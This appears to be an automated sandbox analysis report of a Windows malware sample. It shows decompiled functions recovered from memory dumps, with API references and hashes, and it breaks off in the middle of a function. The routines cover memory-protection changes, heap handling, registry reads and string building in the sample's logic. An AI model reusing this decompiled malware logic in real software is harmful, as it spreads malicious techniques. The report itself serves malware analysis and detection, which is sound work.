APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1A176D
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1A1833
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E1A184E

Strings

Jun 9 2021, xrefs: 6E1A17A0

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Jun 9 2021
API String ID: 4010158826-3443083063
Opcode ID: 9ee987d4337baf73de35657b45b5a849f16d54f66e5369822840433e9b3a3713
Instruction ID: a2ffc2b6b07d31ceef55eeb96673abdc66b629b98b876be4ff9618fd13ae6b5d
Opcode Fuzzy Hash: 9ee987d4337baf73de35657b45b5a849f16d54f66e5369822840433e9b3a3713
Instruction Fuzzy Hash: 19413CB9E0021A9FDB00CFDDC884AFEBBB6BF55314F248169DA1077244C775A989DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02EA3AB0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 02EA3B0D
SysAllocString.OLEAUT32(02EA85ED), ref: 02EA3B51
SysFreeString.OLEAUT32(00000000), ref: 02EA3B65
SysFreeString.OLEAUT32(00000000), ref: 02EA3B73

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 2b39c41ec57ab932254a0340edba4d38c404405d4ee2fae4df9eb4fccfd4ec34
Instruction ID: dcc19e879836ec63c3a41ba3a8d4a71fc836a276bf23fcb8c38b9444ef26cb8e
Opcode Fuzzy Hash: 2b39c41ec57ab932254a0340edba4d38c404405d4ee2fae4df9eb4fccfd4ec34
Instruction Fuzzy Hash: 65315471981209EFCB05DF99D8E09EE7BB9FF48304B20946EF5059B250D730A981CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02EA6545, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E02EA6545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02EAA71F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x02ea6551
0x02ea6555
0x02ea6556
0x02ea6557
0x02ea6559
0x02ea655b
0x02ea655e
0x02ea6563
0x02ea65fa
0x02ea6601
0x02ea6601
0x02ea656c
0x02ea6573
0x02ea6583
0x02ea6583
0x02ea6589
0x02ea658b
0x02ea6590
0x02ea6599
0x02ea659f
0x02ea65a4
0x02ea65af
0x02ea65b3
0x02ea65b5
0x02ea65b6
0x02ea65bf
0x02ea65c3
0x02ea65d4
0x02ea65c5
0x02ea65ca
0x02ea65cf
0x02ea65de
0x02ea65de
0x02ea65b3
0x02ea65e4
0x02ea65ea
0x02ea65ea
0x02ea65f3
0x02ea65f8
0x02ea65f8
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 02EA6573
lstrlenW.KERNEL32(?), ref: 02EA65A9
memcpy.NTDLL(00000000,?,?,?), ref: 02EA65CA
SysFreeString.OLEAUT32(?), ref: 02EA65DE

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: c6311035b407a0f281de4645b878608f5351e8b30237a80bb38c897acd2934ae
Instruction ID: 819da2384265fab09e660aab31a8dd7c9aa69549f9770509a7993c4dc7be20d9
Opcode Fuzzy Hash: c6311035b407a0f281de4645b878608f5351e8b30237a80bb38c897acd2934ae
Instruction Fuzzy Hash: 26217175940209EFCF11DFA8C99499EBBF9FF49308B148569EA02DB254EB30EA41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02EA486F, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E02EA486F(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E02EAA71F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x2eac284); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x2eac284);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x02ea487a
0x02ea487e
0x02ea4880
0x02ea4881
0x02ea4889
0x02ea4889
0x02ea488d
0x00000000
0x00000000
0x02ea4884
0x02ea4885
0x02ea4888
0x02ea4888
0x02ea4895
0x02ea489a
0x02ea48a0
0x02ea48a8
0x02ea48ae
0x02ea48b0
0x02ea48b5
0x02ea48b9
0x02ea48bb
0x02ea48be
0x02ea48c5
0x02ea48c5
0x02ea48cf
0x02ea48d2
0x02ea48d3
0x02ea48d5
0x02ea48e1
0x02ea48e1
0x02ea48ee

APIs

StrChrA.SHLWAPI(?,00000020,00000000,039C95AC,?,02EA5D25,?,02EA243F,039C95AC,?,02EA5D25), ref: 02EA4889
StrTrimA.KERNELBASE(?,02EAC284,00000002,?,02EA5D25,?,02EA243F,039C95AC,?,02EA5D25), ref: 02EA48A8
StrChrA.SHLWAPI(?,00000020,?,02EA5D25,?,02EA243F,039C95AC,?,02EA5D25), ref: 02EA48B3
StrTrimA.SHLWAPI(00000001,02EAC284,?,02EA5D25,?,02EA243F,039C95AC,?,02EA5D25), ref: 02EA48C5

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 051f15fb63ea7c900ec0eae1e208d8423c67319d1f3d3b7d73fdf65c659efeab
Instruction ID: 5e59244cfef19883a3ea5c1a19ccda24dd730c2ec96902d7e9a0f6b588d577a1
Opcode Fuzzy Hash: 051f15fb63ea7c900ec0eae1e208d8423c67319d1f3d3b7d73fdf65c659efeab
Instruction Fuzzy Hash: 2E01F571A813919BD2209E669C58F2BBB9CEB45A94F11A519F842CB280DBB0E80186B0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A15EA, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1A15EA(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E1A1456(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e1a15f3
0x6e1a15f8
0x6e1a1606
0x6e1a160b
0x6e1a160b
0x6e1a1611
0x6e1a1616
0x6e1a161a
0x6e1a161e
0x6e1a161e
0x6e1a1628
0x6e1a1631

APIs

GetCurrentThread.KERNEL32 ref: 6E1A15ED
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1A15F8
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1A160B
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E1A161E

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 019255f10a3cb02f98da52c514603749922b7c5bfd3f187a8848669d2cbc7057
Instruction ID: f6fed7b1656c432a00ab8b610024053b2c3ba1349f142540ed74bbc3df10f57b
Opcode Fuzzy Hash: 019255f10a3cb02f98da52c514603749922b7c5bfd3f187a8848669d2cbc7057
Instruction Fuzzy Hash: 9EE09B753066115BA6015A6D4C48F7FB76CDF963717118335F631D31D0DB608C06A5B8

Uniqueness

Uniqueness Score: -1.00%

Function 02EA8D14, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EA8D14(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E02EAA2F9(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2ead2a8; // 0xb1a5a8
				_t4 = _t24 + 0x2eaedc0; // 0x39c9368
				_t5 = _t24 + 0x2eaed68; // 0x4f0053
				_t26 = E02EA5356( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2ead2a8; // 0xb1a5a8
						_t11 = _t32 + 0x2eaedb4; // 0x39c935c
						_t48 = _t11;
						_t12 = _t32 + 0x2eaed68; // 0x4f0053
						_t52 = E02EA45C6(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x2ead2a8; // 0xb1a5a8
							_t13 = _t35 + 0x2eaedfe; // 0x30314549
							if(E02EA8E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x2ead25c - 6;
								if( *0x2ead25c <= 6) {
									_t42 =  *0x2ead2a8; // 0xb1a5a8
									_t15 = _t42 + 0x2eaec0a; // 0x52384549
									E02EA8E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x2ead2a8; // 0xb1a5a8
							_t17 = _t38 + 0x2eaedf8; // 0x39c93a0
							_t18 = _t38 + 0x2eaedd0; // 0x680043
							_t45 = E02EA5D7D(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x2ead238, 0, _t52);
						}
					}
					HeapFree( *0x2ead238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E02EA4F14(_t54);
				}
				return _t45;
			}

0x02ea8d14
0x02ea8d24
0x02ea8d27
0x02ea8d2e
0x02ea8d30
0x02ea8d30
0x02ea8d33
0x02ea8d38
0x02ea8d3f
0x02ea8d4c
0x02ea8d51
0x02ea8d55
0x02ea8d63
0x02ea8d71
0x02ea8d75
0x02ea8e06
0x02ea8e06
0x02ea8d7b
0x02ea8d7b
0x02ea8d80
0x02ea8d80
0x02ea8d87
0x02ea8d93
0x02ea8d95
0x02ea8d97
0x02ea8d99
0x02ea8da0
0x02ea8db2
0x02ea8db4
0x02ea8dbb
0x02ea8dbd
0x02ea8dc4
0x02ea8dcf
0x02ea8dcf
0x02ea8dbb
0x02ea8dd4
0x02ea8dd9
0x02ea8de0
0x02ea8dfe
0x02ea8e00
0x02ea8e00
0x02ea8d97
0x02ea8e12
0x02ea8e12
0x02ea8e14
0x02ea8e19
0x02ea8e1b
0x02ea8e1b
0x02ea8e26

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,039C9368,00000000,?,74B5F710,00000000,74B5F730), ref: 02EA8D63
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,039C93A0,?,00000000,30314549,00000014,004F0053,039C935C), ref: 02EA8E00
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02EA523E), ref: 02EA8E12

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2854ad7fc019f1a8f09d3b694784568e3452a2a7496c9ab4f30d2ef086d5acd7
Instruction ID: 5ad691d3f82430778a7e7d14ce60303dffedd33971bd46ac0686424eaca6729b
Opcode Fuzzy Hash: 2854ad7fc019f1a8f09d3b694784568e3452a2a7496c9ab4f30d2ef086d5acd7
Instruction Fuzzy Hash: 5F31BC71AC0108BFDB10EBA1DC94EDA7BBDEF45708F569465B504AB060E370BA94CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02EAA376, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E02EAA376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t25;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x2ead340; // 0x39c9a88
				_push(0x800);
				_push(0);
				_push( *0x2ead238);
				if( *0x2ead24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x2ead24c =  *0x2ead24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E02EA7306(_t44, _t40); // executed
						_t18 = E02EA4A09(_t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x2ead24c < 5) {
								 *0x2ead24c =  *0x2ead24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E02EA6761();
						RtlFreeHeap( *0x2ead238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E02EA1F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				_t25 = RtlAllocateHeap(); // executed
				if(_t25 == 0) {
					goto L6;
				}
				_t24 = E02EA4AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}

0x02eaa376
0x02eaa376
0x02eaa379
0x02eaa37a
0x02eaa384
0x02eaa38b
0x02eaa390
0x02eaa392
0x02eaa398
0x02eaa3c0
0x02eaa3d8
0x02eaa3da
0x02eaa3db
0x02eaa3dd
0x02eaa41b
0x02eaa41b
0x02eaa421
0x02eaa427
0x02eaa427
0x02eaa3df
0x02eaa3e5
0x02eaa3e8
0x02eaa3f7
0x02eaa3f9
0x02eaa400
0x02eaa434
0x02eaa439
0x02eaa43b
0x02eaa43d
0x02eaa43d
0x00000000
0x02eaa43b
0x02eaa402
0x02eaa407
0x02eaa415
0x00000000
0x02eaa415
0x02eaa3cf
0x02eaa3d4
0x02eaa3d4
0x00000000
0x02eaa3d4
0x02eaa39a
0x02eaa3a2
0x00000000
0x00000000
0x02eaa3b1
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 02EAA39A

Part of subcall function 02EA4AB6: GetTickCount.KERNEL32 ref: 02EA4ACA
Part of subcall function 02EA4AB6: wsprintfA.USER32 ref: 02EA4B1A
Part of subcall function 02EA4AB6: wsprintfA.USER32 ref: 02EA4B37
Part of subcall function 02EA4AB6: wsprintfA.USER32 ref: 02EA4B63
Part of subcall function 02EA4AB6: HeapFree.KERNEL32(00000000,?), ref: 02EA4B75
Part of subcall function 02EA4AB6: wsprintfA.USER32 ref: 02EA4B96
Part of subcall function 02EA4AB6: HeapFree.KERNEL32(00000000,?), ref: 02EA4BA6
Part of subcall function 02EA4AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02EA4BD4
Part of subcall function 02EA4AB6: GetTickCount.KERNEL32 ref: 02EA4BE5

RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 02EAA3B8
RtlFreeHeap.NTDLL(00000000,00000002,02EA5289,?,02EA5289,00000002,?,?,02EA5D5E,?), ref: 02EAA415

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: 70d163cbaab828b6ce41fef93826f4625e36ae7d61c72ca70a5dc9f345dfbeb8
Instruction ID: 4e5e04189e55ddab83d1e3f3163e811a71ff9949b1230e2ed7e8852de03c66bc
Opcode Fuzzy Hash: 70d163cbaab828b6ce41fef93826f4625e36ae7d61c72ca70a5dc9f345dfbeb8
Instruction Fuzzy Hash: F9213D756C0204EBCB119F9ADC94AAE37BDEB84344F109426F9059B240DBB0F995DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1020, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1A1020(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e1a4140;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6e1a102a
0x6e1a1037
0x6e1a103d
0x6e1a1049
0x6e1a1059
0x6e1a105b
0x6e1a1063
0x6e1a10f8
0x6e1a10ff
0x00000000
0x00000000
0x00000000
0x6e1a1069
0x6e1a1069
0x6e1a1069
0x6e1a106d
0x00000000
0x00000000
0x6e1a1079
0x6e1a107d
0x6e1a10a1
0x6e1a10a5
0x6e1a10b9
0x6e1a10b9
0x6e1a10bf
0x6e1a10ce
0x6e1a10d2
0x6e1a10da
0x6e1a10da
0x6e1a10e2
0x6e1a10e5
0x6e1a10f2
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1a10f2
0x6e1a10ad
0x6e1a10b1
0x6e1a10b7
0x00000000
0x00000000
0x00000000
0x6e1a10b7
0x6e1a1085
0x6e1a1089
0x6e1a1093
0x6e1a108b
0x6e1a108b
0x6e1a108b
0x00000000
0x6e1a1089
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E1A1059
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1A10CE
GetLastError.KERNEL32 ref: 6E1A10D4

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 6a19d56d0da8a6b153580a2215d64b00e0f1d16bdfd8de5584517e2fcaaf7a01
Instruction ID: f5e6547e7161758454d1423c3de4eeb7e62cbc3e19b4a545279692c9fb8bc555
Opcode Fuzzy Hash: 6a19d56d0da8a6b153580a2215d64b00e0f1d16bdfd8de5584517e2fcaaf7a01
Instruction Fuzzy Hash: 1C219175A00206DFCB14CFE9C681ABEF7F6FF04319F00885AD20297481E3B8A699DB51

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1526, Relevance: 3.8, APIs: 3, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EA1526(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x90;
				_v12 = 0x90;
				_t24 = E02EAA71F(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x2ead2d8, 0x90);
					_t27 =  *0x2ead2dc; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E02EA1709(0x90, _a4, _t27, 0);
					}
					if(E02EA14F3( &_v36) != 0) {
						_t35 = E02EA37B8(0x90, _a4,  &_v20,  &_v12,  &_v36, 0); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_v16 = E02EA4776(_t55, _a8, _t51, _t46, _a12);
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875c6
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E02EAA734(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E02EAA734(_a4);
				}
				return _v16;
			}

0x02ea152c
0x02ea1531
0x02ea153e
0x02ea1541
0x02ea1544
0x02ea1549
0x02ea154e
0x02ea155c
0x02ea1561
0x02ea1566
0x02ea156b
0x02ea156d
0x02ea1575
0x02ea1575
0x02ea1584
0x02ea1599
0x02ea15a0
0x02ea15a7
0x02ea15ad
0x02ea15bb
0x02ea15c1
0x02ea15c4
0x02ea15d1
0x02ea15d6
0x02ea15da
0x02ea15da
0x02ea15a0
0x02ea15e5
0x02ea15f0
0x02ea15f0
0x02ea15fc

APIs

Part of subcall function 02EAA71F: RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

memcpy.NTDLL(00000000,00000090,00000002,00000002,02EA5289,00000008,02EA5289,02EA5289,?,02EAA3FE,02EA5289), ref: 02EA155C
memset.NTDLL ref: 02EA15D1
memset.NTDLL ref: 02EA15E5

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: ce29d2231fded2ab103253910a5895d00f0941bdcf123aa48e979db44d9a3363
Instruction ID: ed6691e304aaf0198ebe17f26f14b190e71d1c6724284063e3c78fe31cbc810e
Opcode Fuzzy Hash: ce29d2231fded2ab103253910a5895d00f0941bdcf123aa48e979db44d9a3363
Instruction Fuzzy Hash: FC213075940218ABDB01EF65CC50BDE7BB9AF08350F048025F908EE250E734EA11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EA219B, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E02EA219B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02EA3AB0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x2ead2a8; // 0xb1a5a8
						_t20 = _t68 + 0x2eae1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02EA57B4(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
